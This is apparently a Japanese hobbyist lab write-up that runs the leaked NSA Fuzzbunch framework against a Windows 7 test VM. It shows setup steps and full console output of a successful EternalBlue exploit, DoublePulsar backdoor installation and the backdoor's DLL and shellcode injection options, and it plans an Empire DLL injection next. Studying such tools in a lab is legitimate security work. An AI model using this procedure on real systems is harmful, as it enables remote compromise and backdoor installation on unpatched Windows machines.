NSAのハッキングツールを検証してみる。
GitHubからダウンロード。
事前にPython2.6.6(32bit)とPywin32 v2.12をダウンロード。
windowsフォルダ内のfb.pyを使う。このfb.pyがFuzzbunchになると思う。
Fuzzbunchは脆弱性検証ツールだそう。僕には攻撃ツールにしか見えないが。
以下のエラーが発生するので、listeningpostsフォルダを事前に作成しておく。
WindowsError: [Error 3] 指定されたパスが見つかりません。: ‘C:\\shadowbroker-master\\windows\\listeningposts/*.*’
pythonで実行し、Eternalblueを実行する。
[*] Redirectionが OFF になるように”NO”にしておく?(←要調査)
PS C:\shadowbroker-master\shadowbroker-master\windows> python .\fb.py --[ Version 3.5.1 [*] Loading Plugins [*] Initializing Fuzzbunch v3.5.1 [*] Adding Global Variables [+] Set ResourcesDir => D:\DSZOPSDISK\Resources [+] Set Color => True [+] Set ShowHiddenParameters => False [+] Set NetworkTimeout => 60 [+] Set LogDir => D:\logs [*] Autorun ON ImplantConfig Autorun List ========================== 0) prompt confirm 1) execute Exploit Autorun List ==================== 0) apply 1) touch all 2) prompt confirm 3) execute Special Autorun List ==================== 0) apply 1) touch all 2) prompt confirm 3) execute Payload Autorun List ==================== 0) apply 1) prompt confirm 2) execute [+] Set FbStorage => C:\shadowbroker-master\shadowbroker-master\windows\storage [*] Retargetting Session [?] Default Target IP Address [] : ・ ・ ・ ・ [*] Initializing Global State [+] Set TargetIp => 10.0.2.4 [+] Set CallbackIp => 10.0.2.5 [+] Redirection ON [+] Set LogDir => C:\shadowbroker-master\shadowbroker-master\windows\logs\test\z10.0.2.4 [+] Set Project => test fb > use Et Eternalblue Eternalchampion Eternalromance Eternalsynergy fb > use Eternalblue ・ ・ ・ ・ [*] Target :: Operating System, Service Pack, and Architecture of target OS 0) XP Windows XP 32-Bit All Service Packs *1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs [?] Target [1] : 1 [!] Preparing to Execute Eternalblue [*] Mode :: Delivery mechanism *0) DANE Forward deployment via DARINGNEOPHYTE 1) FB Traditional deployment from within FUZZBUNCH [?] Mode [0] : 1 ・ ・ ・ ・ [?] Press Any Key To Continue : Module: Eternalblue =================== Name Set Value Redirected Value ---- --------- ---------------- DaveProxyPort 0 NetworkTimeout 60 TargetIp 10.0.2.4 127.0.0.1 TargetPort 445 445 VerifyTarget True VerifyBackdoor True MaxExploitAttempts 3 GroomAllocations 12 ShellcodeBuffer Target WIN72K8R2 [?] Execute Plugin? [Yes] : Yes [*] Executing Plugin [*] Connecting to target for exploitation. [+] Connection established for exploitation. [*] Pinging backdoor... [+] Backdoor not installed, game on. [*] Target OS selected valid for OS indicated by SMB reply [*] CORE raw buffer dump (41 bytes): 0x00000000 57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp 0x00000010 72 69 73 65 20 37 36 30 31 20 53 65 72 76 69 63 rise 7601 Servic 0x00000020 65 20 50 61 63 6b 20 31 00 e Pack 1. [*] Building exploit buffer [*] Sending all but last fragment of exploit packet ................DONE. [*] Sending SMB Echo request [*] Good reply from SMB Echo request [*] Starting non-paged pool grooming [+] Sending SMBv2 buffers ....DONE. [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] Sending SMB Echo request [*] Good reply from SMB Echo request [*] Sending last fragment of exploit packet! DONE. [*] Receiving response from exploit packet [+] ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] Sending egg to corrupted connection. [*] Triggering free of corrupted buffer. [*] Pinging backdoor... [+] Backdoor returned code: 10 - Success! [+] Ping returned Target architecture: x86 (32-bit) [+] Backdoor installed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] CORE sent serialized output blob (2 bytes): 0x00000000 08 00 .. [*] Received output parameters from CORE [+] CORE terminated with status code 0x00000000 [+] Eternalblue Succeeded
“Eternalblue”により、Backdoorがインストールされた事が判る。
Doublepulsarがバックドアだと思っていた。
fb Special (Eternalblue) > show Payload Plugin Category: Payload ======================== Name Version ---- ------- Doublepulsar 1.3.1 Jobadd 1.1.1 Jobdelete 1.1.1 Joblist 1.1.1 Pcdlllauncher 2.3.1 Processlist 1.1.1 Regdelete 1.1.1 Regenum 1.1.1 Regread 1.1.1 Regwrite 1.1.1 Rpcproxy 1.0.1 Smbdelete 1.1.1 Smblist 1.1.1 Smbread 1.1.1 Smbwrite 1.1.1
EternalblueのPayloadの一つがDoublepulsarである事が判る。
fb Special (Eternalblue) > use Doublepulsar [!] Entering Plugin Context :: Doublepulsar [*] Applying Global Variables [+] Set NetworkTimeout => 60 [+] Set TargetIp => 10.0.2.4 [*] Applying Session Parameters [!] Enter Prompt Mode :: Doublepulsar Module: Doublepulsar ==================== Name Value ---- ----- NetworkTimeout 60 TargetIp 10.0.2.4 TargetPort 445 OutputFile Protocol SMB Architecture x86 Function OutputInstall ・ ・ ・ ・ [*] TargetIp :: Target IP Address [?] TargetIp [10.0.2.4] : [*] TargetPort :: Port used by the Double Pulsar back door [?] TargetPort [445] : [*] Protocol :: Protocol for the backdoor to speak *0) SMB Ring 0 SMB (TCP 445) backdoor 1) RDP Ring 0 RDP (TCP 3389) backdoor [?] Protocol [0] : [*] Architecture :: Architecture of the target OS *0) x86 x86 32-bits 1) x64 x64 64-bits [?] Architecture [0] : [*] Function :: Operation for backdoor to perform *0) OutputInstall Only output the install shellcode to a binary file on disk. 1) Ping Test for presence of backdoor 2) RunDLL Use an APC to inject a DLL into a user mode process. 3) RunShellcode Run raw shellcode 4) Uninstall Remove's backdoor from system [?] Function [0] :
このRunDLLでマルウェア本体をぶち込むという訳。ユーザビリティもよく、しっかり作られたツールであると、関心する。
次回はEMPIREで生成したdllを送り込んでみる。